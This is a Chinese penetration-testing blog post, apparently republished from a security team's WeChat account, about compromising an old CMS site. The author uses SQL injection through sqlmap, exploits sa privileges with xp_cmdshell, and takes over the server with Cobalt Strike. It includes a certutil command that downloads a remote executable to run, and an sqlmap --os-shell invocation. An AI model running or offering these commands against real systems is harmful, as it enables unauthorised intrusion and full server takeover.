Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >一次简单又复杂的shell

一次简单又复杂的shell

作者头像
Khan安全团队
发布于 2021-08-26 08:35:25
发布于 2021-08-26 08:35:25
98000
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

从同事那拿到站点比较老旧的,到处都是注入点

直接放入sqlmap里跑

跑出注入后,看见是mssql,这里使用参数:--current-user,发现并不是sa权限。

同事然后跑出后台账号密码后,找半天找不到后台。

在这个站上找不到后台,随即放弃,然后通过子域名上,找到了一个同样的cms,也是到处都是注入到,同样的配方同样味道,还是找不到后台。

再次丢入sqlmap发现是同一个数据库,只是两个站点在不同的库而已,就在快放弃的时候,同样执行了--current-user发现是sa权限,不同的站点居然数据库的权限不一样,这些有的搞了。

既然找不到后台那就直接通过mssql的xp_cmdshell来写shell吧

首先通过—os-cmd=whoami

返回的是system权限

然后再用—os-shell来实现交互式的shell,再通过powershell来上线cs

首先执行了一下dnslog判断一下目标机器出不出外网

发现主机可以出外网,这时候就可以通过powershell进行上线啦,

但是执行的时候却命令后缺发现,跟我执行的命令不相同,仿佛再在列出进程的名字。

而且不跑完执行不了我的命令,问了下同事有没有相同的状况,他说他执行了netstat,然后我们换了几个ip发现无论执行什么都要先把上次的命令执行结果回显完,才可以继续执行下一个命令。

目标主机进程较多,跑是速度又慢,在等了将近4个小时之后终于跑完了。

然后进行poweshell的上线语句:

发现有格式上的错误,经过了一下排错,怀疑可能是单引号跟双引号的符号问题。

所以打算使用下载恶意exe并执行的形式来获取shell。

使用windos自带的证书下载的命令来绕过下载文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
certutil -urlcache -split -f https://xxxxxx cs.exe

下载完后,并执行,这时候nt同事说了一句看下有没有下载成功,随即执行了dir命令

然后发现执行的目录在C:\Windows\System32,底下有9000+个文件,上面说了执行命令后必须回显完成才可以执行下一个命令,心中一万只草泥马奔腾而过。

这里使用了服务器并且加上了sqlmap的免确认参数:--batch命令以及后台执行命令:nohup进行跑

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nohup python sqlmap -r /root/1.txt --batch–os-shell=whoami &

最终在服务器上跑了28个小时才完成了全部回显。。。。。

在上面看到了我们上传的cs的马,随即进行执行

成功上线,system权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
记一次对**网站实战渗透之一把梭
通过返回的数据包确认是IIS7.5,那就直接通过Powershell的方式上线,为防止机器上有杀软,并对shellcode做了免杀,国内主流全通杀。
小生观察室
2021/03/22
8290
记一次对**网站实战渗透之一把梭
文件上传的一个骚操作(低权限+BypassAV)
虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。
HACK学习
2021/01/04
9960
文件上传的一个骚操作(低权限+BypassAV)
记一次渗透日本某大学实战案例
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持 #防护绕过 #内网安全 #实战案例#其他笔记 #资源分享 #MSF 目标站点:http://icfcs.******-u.ac.jp 服务器IP:210.***.***.76(
潇湘信安
2021/01/12
1.4K0
实战博彩站点-从弱口令到提权(文字版)
我们的小团队对偶然发现的bc站点进行的渗透,从一开始只有sqlmap反弹的无回显os-shell到CS上线,到配合MSF上传脏土豆提权,到拿下SYSTEM权限的过程,分享记录一下渗透过程
乌鸦安全
2021/08/05
1.7K0
实战博彩站点-从弱口令到提权(文字版)
对某厂商演示站点的一次渗透测试
其实这个厂商之前就挖过他们家漏洞,提交了不少漏洞给他们,如今都修复了,最近闲来无事,又对他们演示站点进行了一次“深入”研究。
潇湘信安
2022/09/22
4150
对某厂商演示站点的一次渗透测试
【Web实战】记一次对某停车场系统的测试
又是登录框开局,先扫一下目录看看有没有未授权 没扫出东西,其实这种301状态的路径也可以继续扫下去看看,我已经扫过了,没扫出东西,就不贴图了
亿人安全
2023/11/07
3850
【Web实战】记一次对某停车场系统的测试
MSSQL高权限注入写马至中文路径
下班回家的路上拿着手机翻看“潇湘信安技术交流群”聊天记录,看到@Bob、@goddemon两个老哥提到的问题挺感兴趣,正好前几天也帮朋友测试过类似问题,本地有这样的测试环境,所以回到家中就帮着给测试了下,并写了这篇记录文章,过程还是挺有意思的。
潇湘信安
2021/07/01
1.5K0
记一次菠菜站对护卫神的利用
写这篇文章的时候,隔壁情侣正在鼓掌,声音贼响,导致我写的东西可能没有过一遍脑子,写的可能有点混乱。另外值得一提的是,为啥我们做安全的经常隔壁碰到这种人?
Gamma实验室
2021/01/11
2.2K0
记一次菠菜站对护卫神的利用
记一次失败的实战渗透
利用SQL注入去getshell有几种常见的方法,一种是跑数据,跑目录找到网站的管理后台,进入到后台想办法通过文件上传的等方法去拿shell;
潇湘信安
2021/12/02
4270
记一次失败的实战渗透
小白的第一次sql注入实战
当时最初接触安全的时候拿下的第一个shell,还是比较兴奋的,忽略一下文章写的很水。
红队蓝军
2022/05/17
1.1K0
小白的第一次sql注入实战
记一次用sqlmap写入文件测试
IT同路人 公众号ID:IT同路人 记一次用sqlmap写入文件测试 随手测试了下,是个注入,于是就打算丢到了sqlmap里面。 可是sqlmap却是抽了疯是的。。 看着情况,也不是一时半会能有结果
ittongluren
2019/11/19
2.1K0
记一次失败的实战渗透
利用SQL注入去get shell有几种常见的方法,一种是跑数据,跑目录找到网站的管理后台,进入到后台想办法通过文件上传的等方法去拿shell;要么就通过报错,phpinfo界面,404界面等一些方式知道网站绝对路径,然后去写入shell,不过相对于mysql来说条件还是有些苛刻的。 接着就是掏出御剑开始扫网站目录,目录还挺多。
HACK学习
2020/12/16
7860
记一次失败的实战渗透
「实战」 缘分使我们(骗子)相遇
在信息搜集另一个网站的时候,凑巧发现了该网站。经过在百度贴吧的搜索,发现该网站是骗子网站。这才有接下来的剧情~
Power7089
2020/07/27
4930
「实战」 缘分使我们(骗子)相遇
记一次 SQL 注入简单 bypass
sqlmap跑一下:sqlmap --risk=3 --level=3 --batch --thread=1 -r 1.txt --dbms="mssql" --random-agent --prefix="'" --suffix="--" --tamper=space2comment
重生信息安全
2021/01/04
1.2K0
记一次 SQL 注入简单 bypass
实战 | 记一次利用mssql上线
漏洞挖掘 在一次渗透测试过程中,对主站进行漏洞挖掘无果后,对子站进行挖掘。在子站发现mssql注入漏洞 Getshell
F12sec
2022/09/29
5910
实战 | 记一次利用mssql上线
记一次因API接口问题导致目标内网沦陷
在跟女朋友一起散步的时候,突然接到通知,客户已经给了测试的资产范围如下,目标要求拿到目标服务器内网权限。
释然IT杂谈
2020/12/08
8020
记一次因API接口问题导致目标内网沦陷
记一次bc推广
朋友给了我一个站,算一个比较大的bc,主站看了一下,没有入口,就换了他的一个推广平台
重生信息安全
2020/11/19
1K0
记一次bc推广
记一次堆叠注入拿shell的总结
本来对堆叠注入没啥了解,这次正巧碰到mssql的堆叠注入,正好加强一下对堆叠注入的理解。
黄啊码
2022/06/20
2.9K0
记一次利用阿D注入渗透实战案例
在这个网站共找到了3处SA权限的搜索型注入,随便在一个搜索框中输入'单引号后即会爆出语法错误。
潇湘信安
2021/01/12
1K0
记一次利用阿D注入渗透实战案例
给我一个SQL注入我能干翻你内网
大家好,这里是 渗透攻击红队 的第 48 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新
渗透攻击红队
2021/02/24
2.1K1
给我一个SQL注入我能干翻你内网
相关推荐
记一次对**网站实战渗透之一把梭
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验